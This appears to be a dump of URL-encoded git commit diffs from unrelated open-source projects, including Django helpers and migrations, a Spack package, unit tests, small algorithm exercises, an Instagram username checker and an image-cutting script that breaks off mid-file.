| 0 |
@@ -0,0 +1,824 @@
+#!/usr/bin/env python3%0A%22%22%22Run Django shell with imported modules%22%22%22%0Aif __name__ == %22__main__%22:%0A import os%0A%0A if not os.environ.get(%22PYTHONSTARTUP%22):%0A from subprocess import check_call%0A import sys%0A%0A base_dir = os.path.dirname(os.path.abspath(__file__))%0A%0A sys.exit(%0A check_call(%0A %5Bos.path.join(base_dir, %22manage.py%22), %22shell%22, *sys.argv%5B1:%5D%5D,%0A env=%7B**os.environ, %22PYTHONSTARTUP%22: os.path.join(base_dir, %22repl.py%22)%7D,%0A )%0A )%0A%0A # put imports here used by PYTHONSTARTUP%0A from django.conf import settings%0A%0A for app in settings.INSTALLED_APPS:%0A try:%0A exec( # pylint: disable=exec-used%0A %22from %7Bapp%7D.models import *%22.format(app=app)%0A )%0A except ModuleNotFoundError:%0A pass%0A
|
|
21799cbe81c57f80f66cb5a90992d6ff66c31e2d
|
Create new package. (#5919)
|
var/spack/repos/builtin/packages/r-hmisc/package.py
|
var/spack/repos/builtin/packages/r-hmisc/package.py
|
Python
| 0 |
@@ -0,0 +1,2543 @@
+##############################################################################%0A# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.%0A# Produced at the Lawrence Livermore National Laboratory.%0A#%0A# This file is part of Spack.%0A# Created by Todd Gamblin, [email protected], All rights reserved.%0A# LLNL-CODE-647188%0A#%0A# For details, see https://github.com/llnl/spack%0A# Please also see the NOTICE and LICENSE files for our notice and the LGPL.%0A#%0A# This program is free software; you can redistribute it and/or modify%0A# it under the terms of the GNU Lesser General Public License (as%0A# published by the Free Software Foundation) version 2.1, February 1999.%0A#%0A# This program is distributed in the hope that it will be useful, but%0A# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and%0A# conditions of the GNU Lesser General Public License for more details.%0A#%0A# You should have received a copy of the GNU Lesser General Public%0A# License along with this program; if not, write to the Free Software%0A# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA%0A##############################################################################%0Afrom spack import *%0A%0A%0Aclass RHmisc(RPackage):%0A %22%22%22Contains many functions useful for data analysis, high-level%0A graphics, utility operations, functions for computing sample size%0A and power, importing and annotating datasets, imputing missing%0A values, advanced table making, variable clustering, character%0A string manipulation, conversion of R objects to LaTeX and html%0A code, and recoding variables.%22%22%22%0A%0A homepage = %22http://biostat.mc.vanderbilt.edu/Hmisc%22%0A url = %22https://cran.rstudio.com/src/contrib/Hmisc_4.0-3.tar.gz%22%0A list_url = %22https://cran.r-project.org/src/contrib/Archive/Hmisc%22%0A%0A version('4.0-3', '7091924db1e473419d8116c3335f82da')%0A%0A 
depends_on('r-lattice', type=('build', 'run'))%0A depends_on('r-survival', type=('build', 'run'))%0A depends_on('r-formula', type=('build', 'run'))%0A depends_on('r-ggplot2', type=('build', 'run'))%0A depends_on('r-latticeextra', type=('build', 'run'))%0A depends_on('r-acepack', type=('build', 'run'))%0A depends_on('r-gridextra', type=('build', 'run'))%0A depends_on('r-data-table', type=('build', 'run'))%0A depends_on('r-htmltools', type=('build', 'run'))%0A depends_on('r-base64enc', type=('build', 'run'))%0A depends_on('r-htmltable', type=('build', 'run'))%0A depends_on('r-viridis', type=('build', 'run'))%0A
|
|
cf7c33e3b3d733f24376badac70392ecb5f5a323
|
add more tests
|
tests/test_build_definitions.py
|
tests/test_build_definitions.py
|
Python
| 0 |
@@ -0,0 +1,1416 @@
+from vdist.builder import Build%0Afrom vdist.source import git, directory, git_directory%0A%0A%0Adef test_build_projectroot_from_uri():%0A build = Build(%0A name='my build',%0A app='myapp',%0A version='1.0',%0A source=git(%0A uri='https://github.com/objectified/vdist',%0A branch='release-1.0'%0A ),%0A profile='ubuntu-trusty'%0A )%0A assert build.get_project_root_from_source() == 'vdist'%0A%0A%0Adef test_build_projectroot_from_directory():%0A build = Build(%0A name='my build',%0A app='myapp',%0A version='1.0',%0A source=directory(path='/var/tmp/vdist'),%0A profile='ubuntu-trusty'%0A )%0A assert build.get_project_root_from_source() == 'vdist'%0A%0A%0Adef test_build_projectroot_from_git_directory():%0A build = Build(%0A name='my build',%0A app='myapp',%0A version='1.0',%0A source=git_directory(%0A path='/var/tmp/vdist',%0A branch='release-1.0'%0A ),%0A profile='ubuntu-trusty'%0A )%0A assert build.get_project_root_from_source() == 'vdist'%0A%0A%0Adef test_build_get_safe_dirname():%0A build = Build(%0A name='my build',%0A app='myapp-foo @#%5E&_',%0A version='1.0',%0A source=git_directory(%0A path='/var/tmp/vdist',%0A branch='release-1.0'%0A ),%0A profile='ubuntu-trusty'%0A )%0A assert build.get_safe_dirname() == 'myapp-foo______-1.0-ubuntu-trusty'%0A
|
|
e19097216c090c0e3f4b68c743d6427f012ab69e
|
Add migration for legislator change
|
txlege84/legislators/migrations/0004_auto_20141201_1604.py
|
txlege84/legislators/migrations/0004_auto_20141201_1604.py
|
Python
| 0 |
@@ -0,0 +1,505 @@
+# -*- coding: utf-8 -*-%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import models, migrations%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('legislators', '0003_auto_20141120_1731'),%0A %5D%0A%0A operations = %5B%0A migrations.AlterField(%0A model_name='legislator',%0A name='party',%0A field=models.ForeignKey(related_name='legislators', blank=True, to='legislators.Party', null=True),%0A preserve_default=True,%0A ),%0A %5D%0A
|
|
01327c49590641c8fe918d91a7877aa67fd56e88
|
Add lc0172_factorial_trailing_zeroes.py
|
lc0172_factorial_trailing_zeroes.py
|
lc0172_factorial_trailing_zeroes.py
|
Python
| 0.000087 |
@@ -0,0 +1,584 @@
+%22%22%22Leetcode 172. Factorial Trailing Zeroes%0AEasy%0A%0AURL: https://leetcode.com/problems/factorial-trailing-zeroes/%0A%0AGiven an integer n, return the number of trailing zeroes in n!.%0A%0AExample 1:%0AInput: 3%0AOutput: 0%0AExplanation: 3! = 6, no trailing zero.%0A%0AExample 2:%0AInput: 5%0AOutput: 1%0AExplanation: 5! = 120, one trailing zero.%0ANote: Your solution should be in logarithmic time complexity.%0A%22%22%22%0A%0Aclass Solution(object):%0A def trailingZeroes(self, n):%0A %22%22%22%0A :type n: int%0A :rtype: int%0A %22%22%22%0A pass%0A%0A%0Adef main():%0A pass%0A%0A%0Aif __name__ == '__main__':%0A main()%0A
|
|
6a9b224834d1a523b03ce1e7c6ff4fa3ccea2583
|
Add tests for parse_utils.extract_tables.
|
tests/test_parse_utils.py
|
tests/test_parse_utils.py
|
Python
| 0 |
@@ -0,0 +1,1003 @@
+from pgcli.packages.parseutils import extract_tables%0A%0Adef test_simple_select_single_table():%0A tables = extract_tables('select * from abc')%0A assert tables == %5B'abc'%5D%0A%0Adef test_simple_select_multiple_tables():%0A tables = extract_tables('select * from abc, def')%0A assert tables == %5B'abc', 'def'%5D%0A%0Adef test_simple_select_with_cols_single_table():%0A tables = extract_tables('select a,b from abc')%0A assert tables == %5B'abc'%5D%0A%0Adef test_simple_select_with_cols_multiple_tables():%0A tables = extract_tables('select a,b from abc, def')%0A assert tables == %5B'abc', 'def'%5D%0A%0A#def test_select_with_hanging_comma_single_table():%0A #tables = extract_tables('select a, from abc')%0A #assert tables == %5B'abc'%5D%0A%0A#def test_select_with_hanging_comma_multiple_tables():%0A #tables = extract_tables('select a, from abc, def')%0A #assert tables == %5B'abc'%5D%0A%0A#def test_simple_insert_single_table():%0A #tables = extract_tables('insert into abc (id, name) values (1, %22def%22)')%0A #assert tables == %5B'abc'%5D%0A
|
|
897843932937faa841220cde90bdc89603d95615
|
Solve hackerrank linked list problem
|
hackerrank/linked-list/dedup.py
|
hackerrank/linked-list/dedup.py
|
Python
| 0.005101 |
@@ -0,0 +1,463 @@
+# https://www.hackerrank.com/challenges/delete-duplicate-value-nodes-from-a-sorted-linked-list/problem%0A%0Adef RemoveDuplicates(head):%0A if head is None:%0A return None%0A %0A curr = head%0A while curr.next is not None:%0A currentData = curr.data%0A next = curr.next;%0A nextData = next.data%0A %0A if currentData == nextData:%0A curr.next = curr.next.next%0A else: %0A curr = curr.next %0A return head
|
|
b3a20379162a068cc8f9a0f314a21a46ec40e4c6
|
Add simple unit test for snapshot iteration class
|
test.py
|
test.py
|
Python
| 0 |
@@ -0,0 +1,819 @@
+#!/usr/bin/env python%0A%0Aimport unittest%0Afrom fix_time_machine_backup import SnapshotList%0A%0Aclass TestSnapshotList(unittest.TestCase):%0A def setUp(self):%0A self.snapshot_list = SnapshotList(%5B%0A 'auto-20160820.2103-2m', %0A 'auto-20160821.0003-2m', %0A 'auto-20160821.1503-2m', %0A 'auto-20160821.2303-2m', %0A 'auto-20160823.1003-2m', %0A 'auto-20160825.1003-2m', %0A 'auto-20160827.0003-2m', %0A 'auto-20160827.1003-2m', %0A 'auto-20160828.0603-2m',%0A %5D)%0A%0A def test_get_next_snapshot(self):%0A self.assertEqual(self.snapshot_list.get_current_snapshot(), 'auto-20160828.0603-2m')%0A self.assertEqual(self.snapshot_list.get_next_snapshot(), 'auto-20160821.0003-2m')%0A%0A%0Aif __name__ == '__main__':%0A unittest.main()
|
|
aaea97c5cab778174b45cb2557d819deb769a45e
|
Create instagram_checker.py
|
instagram_checker.py
|
instagram_checker.py
|
Python
| 0.000035 |
@@ -0,0 +1,2998 @@
+import requests, argparse, sys%0A%0Aclass checker:%0A def __init__(self):%0A%0A #Declare some variables%0A self.headers = %7B'User-agent': 'Mozilla/5.0'%7D%0A self.loginurl = 'https://www.instagram.com/accounts/login/ajax/'%0A self.url = 'https://www.instagram.com/'%0A%0A #Start a session and update headers%0A self.s = requests.session()%0A self.s.headers.update(self.headers)%0A%0A%0A #Gets username, password, textfile to check usernames, and output file for available usernames.%0A parser = argparse.ArgumentParser()%0A parser.add_argument(%22-u%22, dest='username', help=%22Instagram username%22,%0A action=%22store%22)%0A parser.add_argument(%22-p%22, dest='password', help=%22Instagram password%22,%0A action=%22store%22)%0A parser.add_argument(%22-i%22, dest='inputf', help=%22Textfile with usernames%22,%0A action=%22store%22)%0A parser.add_argument(%22-o%22, dest='outputf', help=%22Output textfile%22,%0A action=%22store%22)%0A args = parser.parse_args()%0A%0A #Save variables from argparse%0A self.username = args.username%0A self.password = args.password%0A self.inputf = args.inputf%0A self.outputf = args.outputf%0A%0A def login(self, username, password):%0A #Logs into instagram%0A loginRequest = self.s.post(%0A self.loginurl,%0A headers=%7B%0A 'x-csrftoken': self.s.get(self.url).text.split('csrf_token%22: %22')%5B1%5D.split('%22')%5B0%5D,%0A 'x-instagram-ajax':'1',%0A 'x-requested-with': 'XMLHttpRequest',%0A 'Origin': self.url,%0A 'Referer': self.url,%0A %7D,%0A data=%7B%0A 'username':username,%0A 'password':password,%0A %7D%0A )%0A %0A if loginRequest.json()%5B'authenticated'%5D:%0A print('Logged In.')%0A else:%0A sys.exit(%22Login Failed, closing program.%22)%0A%0A def get_usernames(self, filename):%0A #Gets username from file%0A with open(filename, %22r%22) as f:%0A usernames = f.read().split(%22%5Cn%22)%0A return usernames%0A%0A def check_usernames(self, username, output):%0A #checks username and saves available usernames to new file%0A for user in 
usernames:%0A r = self.s.get(self.url+user)%0A al = r.text%0A text = al%5Bal.find('%3Ctitle%3E') + 7 :al.find('%3C/title%3E')%5D%0A if %22Page Not Found%22 in text:%0A with open(output, %22a%22) as a:%0A a.write(user+'%5Cn')%0A%0Aif __name__ == %22__main__%22:%0A check = checker()%0A check.login(check.username, check.password)%0A%0A #Clears output file for new usernames%0A with open(check.outputf, %22w%22) as a:%0A print('Output file cleared.')%0A %0A usernames = check.get_usernames(check.inputf)%0A check.check_usernames(usernames, check.outputf)%0A
|
|
20600b8cac9488ff416397de374c2d3dacf4afe4
|
add tests and netcdf-cxx4
|
var/spack/repos/builtin/packages/dealii/package.py
|
var/spack/repos/builtin/packages/dealii/package.py
|
from spack import *
class Dealii(Package):
    """C++ software library providing well-documented tools to build finite
    element codes for a broad variety of PDEs."""

    homepage = "https://www.dealii.org"
    url = "https://github.com/dealii/dealii/releases/download/v8.4.0/dealii-8.4.0.tar.gz"

    version('8.4.0', 'ac5dbf676096ff61e092ce98c80c2b00')

    depends_on("cmake")
    depends_on("blas")
    depends_on("lapack")
    depends_on("mpi")

    depends_on("arpack-ng+mpi")
    depends_on("boost")
    depends_on("doxygen")
    depends_on("hdf5+mpi~cxx")  # FIXME: NetCDF declares dependency with ~cxx, why?
    depends_on("metis")
    depends_on("muparser")
    depends_on("netcdf")
    # depends_on("numdiff")  # FIXME
    depends_on("oce")
    depends_on("p4est")
    depends_on("parmetis")
    depends_on("petsc+mpi")
    depends_on("slepc")
    depends_on("suite-sparse")
    depends_on("tbb")
    depends_on("trilinos")

    def install(self, spec, prefix):
        """Configure with CMake, build, run the test suite and install.

        Builds in DebugRelease mode with threads and MPI enabled, pointing
        CMake at every dependency's install prefix.
        """
        options = []
        options.extend(std_cmake_args)

        # std_cmake_args injects its own -DCMAKE_BUILD_TYPE; strip it so we
        # can request DebugRelease (valid values: DebugRelease|Debug|Release).
        for word in options[:]:
            if word.startswith('-DCMAKE_BUILD_TYPE'):
                options.remove(word)

        options.extend([
            '-DCMAKE_BUILD_TYPE=DebugRelease',
            # BUG FIX: a missing trailing comma here previously fused this
            # flag with -DDEAL_II_WITH_MPI into a single bogus argument,
            # silently breaking both options.
            '-DDEAL_II_WITH_THREADS:BOOL=ON',
            '-DDEAL_II_WITH_MPI:BOOL=ON',
            # FIXME: avoid hardcoding mpi wrapper names
            '-DCMAKE_C_COMPILER=%s' % join_path(self.spec['mpi'].prefix.bin, 'mpicc'),
            '-DCMAKE_CXX_COMPILER=%s' % join_path(self.spec['mpi'].prefix.bin, 'mpic++'),
            '-DCMAKE_Fortran_COMPILER=%s' % join_path(self.spec['mpi'].prefix.bin, 'mpif90'),
            '-DARPACK_DIR=%s' % spec['arpack-ng'].prefix,
            '-DBOOST_DIR=%s' % spec['boost'].prefix,
            '-DHDF5_DIR=%s' % spec['hdf5'].prefix,
            '-DMETIS_DIR=%s' % spec['metis'].prefix,
            # BUG FIX: dropped a stray trailing space inside the option value
            '-DMUPARSER_DIR=%s' % spec['muparser'].prefix,
            '-DNETCDF_DIR=%s' % spec['netcdf'].prefix,
            '-DOPENCASCADE_DIR=%s' % spec['oce'].prefix,
            '-DP4EST_DIR=%s' % spec['p4est'].prefix,
            '-DPETSC_DIR=%s' % spec['petsc'].prefix,
            '-DSLEPC_DIR=%s' % spec['slepc'].prefix,
            '-DUMFPACK_DIR=%s' % spec['suite-sparse'].prefix,
            '-DTBB_DIR=%s' % spec['tbb'].prefix,
            '-DTRILINOS_DIR=%s' % spec['trilinos'].prefix,
        ])

        cmake('.', *options)
        make()
        make("test")
        make("install")
|
Python
| 0 |
@@ -12,16 +12,30 @@
import *
+%0Aimport shutil
%0A%0Aclass
@@ -709,16 +709,21 @@
(%22netcdf
+-cxx4
%22)%0A #
@@ -2050,16 +2050,21 @@
%5B'netcdf
+-cxx4
'%5D.prefi
@@ -2525,24 +2525,24 @@
ake(%22test%22)%0A
-
make
@@ -2553,8 +2553,1187 @@
stall%22)%0A
+%0A # run some MPI examples with different solvers from PETSc and Trilinos%0A env%5B'DEAL_II_DIR'%5D = prefix%0A # take bare-bones step-3%0A with working_dir('examples/step-3'):%0A cmake('.')%0A make('release')%0A make('run',parallel=False)%0A%0A # take step-40 which can use both PETSc and Trilinos%0A # FIXME: switch step-40 to MPI run%0A with working_dir('examples/step-40'):%0A # list the number of cycles to speed up%0A filter_file(r'(const unsigned int n_cycles = 8;)', ('const unsigned int n_cycles = 2;'), 'step-40.cc')%0A cmake('.')%0A make('release')%0A make('run',parallel=False)%0A%0A # change Linear Algebra to Trilinos%0A filter_file(r'(#define USE_PETSC_LA.*)', (''), 'step-40.cc')%0A make('release')%0A make('run',parallel=False)%0A%0A with working_dir('examples/step-36'):%0A cmake('.')%0A make('release')%0A make('run',parallel=False)%0A%0A with working_dir('examples/step-54'):%0A cmake('.')%0A make('release')%0A # FIXME%0A # make('run',parallel=False)%0A
|
16aa4a292fafa2a74f668a56c5cf1a66f923df24
|
Make src.cm.tools a package
|
src/cm/tools/__init__.py
|
src/cm/tools/__init__.py
|
Python
| 0.000437 |
@@ -0,0 +1,70 @@
+%22%22%22@package cm.tools%0A@date Jun 6, 2014%0A%0A@author Zosia Soboci%C5%84ska%0A%22%22%22%0A%0A
|
|
519d6052e3bf16c8028d39eab374cd2aa17ffd4e
|
add position field to user committee
|
application/migrations/0014_usercommittee_position.py
|
application/migrations/0014_usercommittee_position.py
|
Python
| 0 |
@@ -0,0 +1,462 @@
+# -*- coding: utf-8 -*-%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import models, migrations%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('application', '0013_auto_20150313_2126'),%0A %5D%0A%0A operations = %5B%0A migrations.AddField(%0A model_name='usercommittee',%0A name='position',%0A field=models.CharField(max_length=255, default=''),%0A preserve_default=False,%0A ),%0A %5D%0A
|
|
557b0f30e0180a526433b65915d2a137144f2f05
|
add test_logger.py
|
tests/unit/test_logger.py
|
tests/unit/test_logger.py
|
Python
| 0.000007 |
@@ -0,0 +1,1050 @@
+# Tai Sakuma %[email protected]%3E%0Aimport logging%0A%0Aimport alphatwirl%0A%0A##__________________________________________________________________%7C%7C%0Adef test_logger_exist():%0A assert 'alphatwirl' in logging.Logger.manager.loggerDict%0A%0Adef test_len_handlers():%0A logger = logging.getLogger('alphatwirl')%0A assert len(logger.handlers) %3E= 1%0A%0A##__________________________________________________________________%7C%7C%0Adef test_example():%0A logger_names = logging.Logger.manager.loggerDict.keys()%0A loglevel_dict = %7Bl: logging.getLogger(l).getEffectiveLevel() for l in logger_names%7D%0A%0A # a dict of names and levels of loggers%0A # e.g.,%0A # %7B%0A # 'alphatwirl': 40,%0A # 'alphatwirl.delphes': 40,%0A # 'alphatwirl.loop': 40,%0A # 'pandas': 0,%0A # %7D%0A # %0A # https://docs.python.org/3/library/logging.html#logging-levels%0A # Level Numeric value%0A # CRITICAL 50%0A # ERROR 40%0A # WARNING 30%0A # INFO 20%0A # DEBUG 10%0A # NOTSET 0%0A%0A##__________________________________________________________________%7C%7C%0A
|
|
59b00a4f5cc5aa5139492660206c99185df24f7b
|
create unittest for area serializer for #191
|
popit/tests/test_area_api.py
|
popit/tests/test_area_api.py
|
Python
| 0 |
@@ -0,0 +1,485 @@
+from rest_framework.test import APITestCase%0Afrom rest_framework import status%0Afrom rest_framework.authtoken.models import Token%0Afrom popit.models import *%0A%0A%0Aclass AreaAPITestCase(APITestCase):%0A fixtures = %5B %22api_request_test_data.yaml%22 %5D%0A%0A def test_create_area_serializer(self):%0A pass%0A%0A def test_fetch_area_serializer(self):%0A client = self.client.get(%22/en/areas/b0c2dbaba8ea476f91db1e3c2320dcb7%22)%0A %0A%0A def test_update_area_serializer(self):%0A pass
|
|
a8274a5d5e4ec68f3ee594ffa741e90f11cf24db
|
Add tool to regenerate JSON files from P4 progs
|
tools/update_test_bmv2_jsons.py
|
tools/update_test_bmv2_jsons.py
|
Python
| 0.000001 |
@@ -0,0 +1,2155 @@
+#!/usr/bin/env python2%0A%0Aimport argparse%0Aimport fnmatch%0Aimport os%0Aimport subprocess%0Aimport sys%0A%0Adef find_files(root):%0A files = %5B%5D%0A for path_prefix, _, filenames in os.walk(root, followlinks=False):%0A for filename in fnmatch.filter(filenames, '*.p4'):%0A path = os.path.join(path_prefix, filename)%0A json_path = os.path.splitext(path)%5B0%5D + %22.json%22%0A if os.path.exists(json_path):%0A files.append(%5Bpath, json_path%5D)%0A return files%0A%0Adef check_compiler_exec(path):%0A try:%0A with open(os.devnull, 'w') as devnull:%0A subprocess.check_call(%5Bpath, %22--version%22%5D,%0A stdout=devnull, stderr=devnull)%0A return True%0A except subprocess.CalledProcessError:%0A return True%0A except OSError: # exec not found%0A return False%0A%0Adef main():%0A parser = argparse.ArgumentParser(%0A description=%22Search for P4 files recursively in provided directory %22%0A %22and if they have a JSON equivalent regenerates it using the bmv2 %22%0A %22compiler.%22)%0A parser.add_argument(%22--root%22, type=str, default=os.getcwd(),%0A help=%22Directory in which to recursively search for P4 %22%0A %22files. Default is current working directory.%22)%0A parser.add_argument(%22--compiler%22, type=str, default=%22p4c-bmv2%22,%0A help=%22bmv2 compiler to use. Default is p4c-bmv2.%22)%0A args = parser.parse_args()%0A%0A if not check_compiler_exec(args.compiler):%0A print %22Cannot use provided compiler%22%0A sys.exit(1)%0A%0A files = find_files(args.root)%0A for input_f, output_f in files:%0A print %22Regenerating%22, input_f, %22-%3E%22, output_f%0A try:%0A cmd = %5Bargs.compiler, input_f, %22--json%22, output_f, %22--keep-pragmas%22%5D%0A with open(os.devnull, 'w') as devnull:%0A out = subprocess.check_output(cmd, stderr=subprocess.STDOUT)%0A except subprocess.CalledProcessError:%0A print %22ERROR%22%0A print %22 %22.join(cmd)%0A print out%0A except OSError:%0A print %22FATAL ERROR%22%0A sys.exit(2)%0A%0Aif __name__ == '__main__':%0A main()%0A
|
|
f1d3717b45650244d9a4f44caf6f610636bb72ee
|
Add other_data_collections/2015ApJ...812...60B/biteau.py
|
other_data_collections/2015ApJ...812...60B/biteau.py
|
other_data_collections/2015ApJ...812...60B/biteau.py
|
Python
| 0 |
@@ -0,0 +1,558 @@
+%22%22%22%0AScript to check and ingest Biteau & Williams (2015) data for gamma-cat.%0A%22%22%22%0Afrom astropy.table import Table%0A%0A%0Aclass Biteau:%0A def __init__(self):%0A filename = 'other_data_collections/2015ApJ...812...60B/BiteauWilliams2015_AllData_ASDC_v2016_12_20.ecsv'%0A self.table = Table.read(filename, format='ascii.ecsv', delimiter='%7C')%0A%0A def run_checks(self):%0A # self.table.pprint()%0A self.table.show_in_browser(jsviewer=True)%0A self.table.info('stats')%0A%0A%0Aif __name__ == '__main__':%0A biteau = Biteau()%0A biteau.run_checks()%0A
|
|
6f7fd163106ec5f4346eaaef04ed9726a3289801
|
add wrong reversesubstring problem solution
|
problems/reversesubstring.py
|
problems/reversesubstring.py
|
Python
| 0.995257 |
@@ -0,0 +1,871 @@
+import sys%0A%0Atest = %22aabbbbababaaabbab%22%0A%0A%22%22%22%0AFind a) the first occurrence of b in string%0A b) the longest list of only as in string, store final index%0A%22%22%22%0A%0Adef solution(string):%0A firstB = string.find('b')%0A print ((string, firstB))%0A if(firstB == -1):%0A return (0, 0)%0A longestA = 0%0A longestAIndex = 0%0A currentA = 0%0A currentAIndex = 0%0A for i in range(firstB, len(string)):%0A if (string%5Bi%5D == 'a'):%0A print (%22found a%22, str(i))%0A currentAIndex = i%0A currentA += 1%0A if(currentA %3E longestA):%0A longestA = currentA%0A longestAIndex = currentAIndex%0A if(string%5Bi%5D == 'b'):%0A currentA = 0%0A return (firstB, longestAIndex)%0A %0A%0Aif __name__ == '__main__':%0A if (len(sys.argv) %3E 1):%0A print(solution(sys.argv%5B1%5D))%0A else:%0A print(solution(test))%0A%0A
|
|
9ff1b6ffa297199dc73042382c369fc7af0813fc
|
Create stress_test1.py
|
home/moz4r/Test/stress_test1.py
|
home/moz4r/Test/stress_test1.py
|
Python
| 0.000033 |
@@ -0,0 +1,653 @@
+# stress test%0A%0Afrom time import sleep%0Aimport random%0A%0AleftPort = %22COM3%22%0A%0Ai01 = Runtime.createAndStart(%22i01%22, %22InMoov%22)%0Asleep(1)%0Ai01.startMouth()%0Ai01.startHead(leftPort)%0Ai01.startLeftHand(leftPort)%0Ai01.head.jaw.map(0,180,85,110)%0Ai01.startMouthControl(leftPort)%0A%0A%0Ai01.leftHand.thumb.setVelocity(random.randint(100,300))%0A%09%0AMoveRandomTimer = Runtime.start(%22MoveRandomTimer%22,%22Clock%22)%0A%0Adef MoveRandom(timedata):%0A%09%0A%09i01.leftHand.thumb.moveTo(random.randint(50,130))%0A%09MoveRandomTimer.setInterval(random.randint(10000,11000))%0A%09i01.mouth.speak(%22voice test voice test%22)%0A%09%0AMoveRandomTimer.addListener(%22pulse%22, python.name, %22MoveRandom%22)%0AMoveRandomTimer.startClock()%0A
|
|
a183922bd275414259800e75fd78db980604fa20
|
create thread3
|
threading/thread3_join.py
|
threading/thread3_join.py
|
Python
| 0 |
@@ -0,0 +1,495 @@
+import threading%0Aimport time%0Adef thread_job():%0A print('T1 start%5Cn')%0A for i in range(10):%0A time.sleep(0.1)%0A print('T1 finish%5Cn')%0A%0Adef T2_job():%0A print('T2 start%5Cn')%0A print('T2 finish%5Cn')%0A%0Adef main():%0A added_thread = threading.Thread(target=thread_job, name='T1')%0A thread2 = threading.Thread(target=T2_job, name='T2')%0A added_thread.start()%0A thread2.start()%0A thread2.join()%0A added_thread.join()%0A%0A print('all done%5Cn')%0A%0Aif __name__ == '__main__':%0A main()
|
|
143dbdb6d0d9840c4991eadbb2f5459398a6ddae
|
Add a 'cache' which only caches ETOPO1 files.
|
joerd/store/cache.py
|
joerd/store/cache.py
|
Python
| 0 |
@@ -0,0 +1,1616 @@
+from joerd.mkdir_p import mkdir_p%0Afrom joerd.plugin import plugin%0Afrom os import link%0Aimport os.path%0A%0A%0Aclass CacheStore(object):%0A %22%22%22%0A Every tile that gets generated requires ETOPO1. Rather than re-download%0A it every time (it's 446MB), we cache that file only.%0A%0A This is a bit of a hack, and would be better replaced by a generic%0A fixed-size LRU/LFU cache. Even better if the cache could be shared%0A between multiple Joerd processes on the same host.%0A %22%22%22%0A%0A def __init__(self, cfg):%0A create_fn = plugin('store', store_type, 'create')%0A self.store = create_fn('store', cfg%5B'store'%5D)%0A self.cache_dir = cfg%5B'cache_dir'%5D%0A%0A def upload_all(self, d):%0A self.store.upload_all(d)%0A%0A @contextmanager%0A def upload_dir(self):%0A with tmpdir() as t:%0A yield t%0A self.upload_all(t)%0A%0A def exists(self, filename):%0A return self.store.exists(filename)%0A%0A def get(self, source, dest):%0A if 'ETOPO1' in source:%0A cache_path = os.path.join(self.cache_dir, source)%0A if not os.path.exists(cache_path):%0A mkdir_p(os.path.dirname(cache_path))%0A self.store.get(source, cache_path)%0A%0A # hard link to dest. this makes it non-portable, but means that%0A # we don't have to worry about whether GDAL supports symbolic%0A # links, and we don't have to worry about deleting files, as they%0A # are reference counted by the OS.%0A link(cache_path, dest)%0A%0A else:%0A self.store.get(source, dest)%0A%0A%0Adef create(cfg):%0A return CacheStore(cfg)%0A
|
|
679ae2966f44a071630934c7b7d9eeb550a59223
|
Create balance_array.py
|
balance_array.py
|
balance_array.py
|
Python
| 0.000521 |
@@ -0,0 +1,1720 @@
+'''%0A%60Balance Array%60%0A%0AFind i in array A where: A%5B1%5D + A%5B2%5D...A%5Bi-1%5D = A%5Bi+1%5D + A%5Bi+2%5D...A%5Blen(A)%5D%0A%0AWrite a %60balanceSum%60 function which take an integer array as input,%0Ait should return the smallest i, where i is an index in the array such that%0Athe sum of elements to its left is equal to the sum of elements to its right.%0A%0ANote: There always exist a solution.%0A'''%0A%0A'''%0ATODO: use %60pytest%60 or the likes to run tests more easily.%0A'''%0A%0Adef balanceSum(A):%0A # Slow performance, need optimization%0A%0A # Iterate from 1-%3EN-1 instead of 0-%3EN or 1-%3EN+1, b/c the %60balance%60 index%0A # can not be 0 or N, checking for them is pointless.%0A # Also iterate from 1-%3EN-1 is obviously faster than 0-%3EN or 1-%3EN+1.%0A for i in range(1, len(A)):%0A left_sum = sum(A%5B:i-1%5D)%0A right_sum = sum(A%5Bi:%5D)%0A%0A if left_sum == right_sum:%0A return i%0A%0A return None%0A%0Adef balanceSum2(A):%0A # currently is wrong%0A left_sum, right_sum = 0, sum(A)%0A%0A for i, value in enumerate(A):%0A i += 1%0A%0A if left_sum == right_sum:%0A return i%0A%0A left_sum += A%5Bi-1%5D%0A right_sum -= A%5Bi%5D%0A%0A print i, left_sum, right_sum%0A%0A return None%0A%0Adef test_one(func):%0A inp = %5B4,1,2,3,3%5D%0A out = 3%0A%0A if out != func(inp):%0A return False%0A return True%0A%0Adef test_two(func):%0A inp = %5B3,1,2,1%5D%0A out = 2%0A%0A if out != func(inp):%0A return False%0A return True%0A%0Adef test_three(func):%0A inp = %5B3,1,3,1%5D%0A out = 2%0A%0A if out != func(inp):%0A return False%0A return True%0A%0Adef main():%0A test_func = balanceSum%0A print test_one(test_func)%0A print test_two(test_func)%0A print test_three(test_func)%0A%0Aif __name__ == '__main__':%0A import sys%0A sys.exit(int(main() or 0))%0A
|
|
19dd8b925b188bc09eb85952db1f9f11db4c570e
|
add batch pics
|
batch_cut_pic.py
|
batch_cut_pic.py
|
Python
| 0 |
@@ -0,0 +1,1297 @@
+#!/usr/bin/env python%0A# -*- coding: utf-8 -*-%0A%0A#function: %E5%89%AA%E5%88%87%E6%9B%B4%E6%94%B9%E5%9B%BE%E7%89%87%E5%B0%BA%E5%AF%B8%E5%A4%A7%E5%B0%8F%0Aimport os%0Aimport os.path%0Aimport sys, getopt, argparse%0Afrom PIL import Image%0A%0Afrom change_pic_size_by_cut import CutImage%0A%0Adef main():%0A%09argc = len(sys.argv)%0A%09cmdargs = str(sys.argv)%0A%09parser = argparse.ArgumentParser(description=%22Tool for batch cut the image%22)%0A%09parser.add_argument('-f', '--fromdir', required=True, help='the directory path of the input file')%0A%09parser.add_argument('-H', '--height',type=int, required=True, help='height of the output file')%0A%09parser.add_argument('-W', '--width',type=int, required=True, help='width of the output file')%0A%09parser.add_argument('-d', '--outdir', required=True, help='the directory of the output file')%0A%09parser.add_argument('-T', '--type', required=False, help='the type of the output file: jpeg, git, png ,etc')%0A%09args = parser.parse_args()%0A%09fromdir = args.fromdir%0A%09outdir = args.outdir%0A%09width = args.width%0A%09height = args.height%0A%09if args.type == None:%0A%09%09type = 'png'%0A%09else:%0A%09%09type = 